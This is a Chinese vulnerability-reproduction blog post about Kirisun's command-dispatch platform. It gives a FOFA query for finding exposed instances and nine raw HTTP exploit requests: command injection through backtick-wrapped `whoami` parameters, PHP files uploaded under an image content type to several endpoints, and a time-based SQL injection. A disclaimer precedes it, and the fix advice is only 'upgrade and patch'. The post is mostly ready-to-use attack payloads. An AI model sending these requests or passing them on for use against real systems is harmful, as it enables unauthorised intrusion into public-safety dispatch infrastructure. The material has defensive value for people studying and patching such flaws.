【漏洞复现】指挥调度平台漏洞集合

2024年1月22日11:51:50评论45 views字数 5066阅读16分53秒阅读模式

SCA御盾实验室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

0x02 产品描述

福建科立讯通信有限公司的指挥调度平台是一款功能强大的通信解决方案。该平台集成了语音、视频、数据等多种通信方式，可实现快速、准确的指挥调度。通过该平台，用户可以实时掌握现场情况，迅速做出决策，提高应对突发事件的能力。同时，该平台还具备高度的可扩展性和灵活性，可根据不同行业和场景的需求进行定制化开发，满足各种复杂的通信需求。在福建科立讯通信有限公司的持续研发和技术支持下，该指挥调度平台已经在多个领域得到广泛应用，为保障公共安全和企业运营提供了强有力的通信保障。

【漏洞复现】指挥调度平台漏洞集合

0x03 fofa语法：

app="指挥调度管理平台"

【漏洞复现】指挥调度平台漏洞集合

0x04 漏洞详情

1、zhihuidiaodupingtai-invite_one_ptter-rce

GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`whoami>test.txt`&force=1&timeout=1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeGET /api/client/ptt/test.txt HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

2、zhihuidiaodupingtai-invite2videoconf-rce

GET /api/client/invite2videoconf.php?callee=1&roomid=`whoami>test.txt` HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeGET /api/client/test.txt HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

3、zhihuidiaodupingtai-fileupload-file-upload

POST /api/client/fileupload.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 477------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="file"; filename="rcnlsq.php"Content-Type: image/jpeg5465rcnlsq------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="number";5465------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="type";1------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="title";1------WebKitFormBoundaryVBf7Cs8QWsfwC82M--

4、zhihuidiaodupingtai-upload-file-upload

POST /api/client/upload.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 194------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="ulfile"; filename="lztkkl.php"Content-Type: image/jpeg99647lztkkl------WebKitFormBoundaryVBf7Cs8QWsfwC82M--GET /upload/lztkkl.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

5、zhihuidiaodupingtai-task-uploadfile-file-upload

POST /api/client/task/uploadfile.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 198------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="uploadfile"; filename="rvfuid.php"Content-Type: image/jpeg97236rvfuid------WebKitFormBoundaryVBf7Cs8QWsfwC82M--文件路径：响应包获取

6、zhihuidiaodupingtai-event-uploadfile-file-upload

POST /api/client/event/uploadfile.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 198------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="uploadfile"; filename="iuctmt.php"Content-Type: image/jpeg48620iuctmt------WebKitFormBoundaryVBf7Cs8QWsfwC82M--文件地址：响应包获取

7、zhihuidiaodupingtai-invite_one_member-rce

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`whoami>test.txt` HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeGET /api/client/audiobroadcast/test.txt HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

8、zhihuidiaodu-client-upload

POST /api/client/upload.php HTTP/1.1Host: User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaKContent-Length: 200------WebKitFormBoundarymVk33liI64J7GQaKContent-Disposition: form-data; name="ulfile"; filename="dzfuxvtm.php"Content-Type: image/jpegdzfuxvtm186448------WebKitFormBoundarymVk33liI64J7GQaK--GET /upload/dzfuxvtm.php HTTP/1.1Host: User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

9、zhihuidiaodu-getusername-sqli

/api/client/getusername.php?number=1%20AND%20(SELECT%205443%20FROM%20(SELECT(SLEEP(10)))FIjE)

0x05 修复建议

1、升级指挥调度平台至最新版本

2、官网下载最新安全补丁：https://kirisun.com

漏洞poc+漏洞批量扫描脚本

原文始发于微信公众号（SCA御盾）：【漏洞复现】指挥调度平台漏洞集合

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】指挥调度平台漏洞集合

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信